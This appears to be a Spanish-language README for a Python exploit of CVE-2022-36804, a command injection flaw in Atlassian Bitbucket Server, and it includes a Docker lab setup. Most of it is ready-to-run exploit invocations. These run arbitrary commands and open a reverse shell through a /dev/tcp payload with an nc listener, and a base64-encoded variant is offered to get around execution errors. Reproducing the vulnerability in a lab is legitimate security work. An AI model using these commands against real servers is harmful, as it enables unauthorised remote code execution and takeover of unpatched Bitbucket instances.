
Exploit en Python para la inyección de comandos CVE-2022-36804 en Atlassian Bitbucket Server, que permite ejecución remota de código y shell inversa con comandos personalizables y entorno de laboratorio Docker.
Se encontró una vulnerabilidad crítica de inyección de comandos en múltiples endpoints de API de Atlassian Bitbucket Server y Data Center. Esta vulnerabilidad afecta a todas las versiones de Bitbucket Server y Data Center lanzadas antes de las versiones <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 y <8.3.1
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
Reemplace 172.17.0.3 con su dirección IP local
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"
nc -lvp 4444
https://www.revshells.comConvierta `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` a base64 en caso de error de ejecución del payload.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"
Se recomienda instalar una versión vulnerable de Bitbucket Server en una máquina Windows/Linux para practicar. Será más fácil obtener una reverse shell en comparación con las imágenes Docker.
Más información se puede encontrar [aquí](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)
# Referencias
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804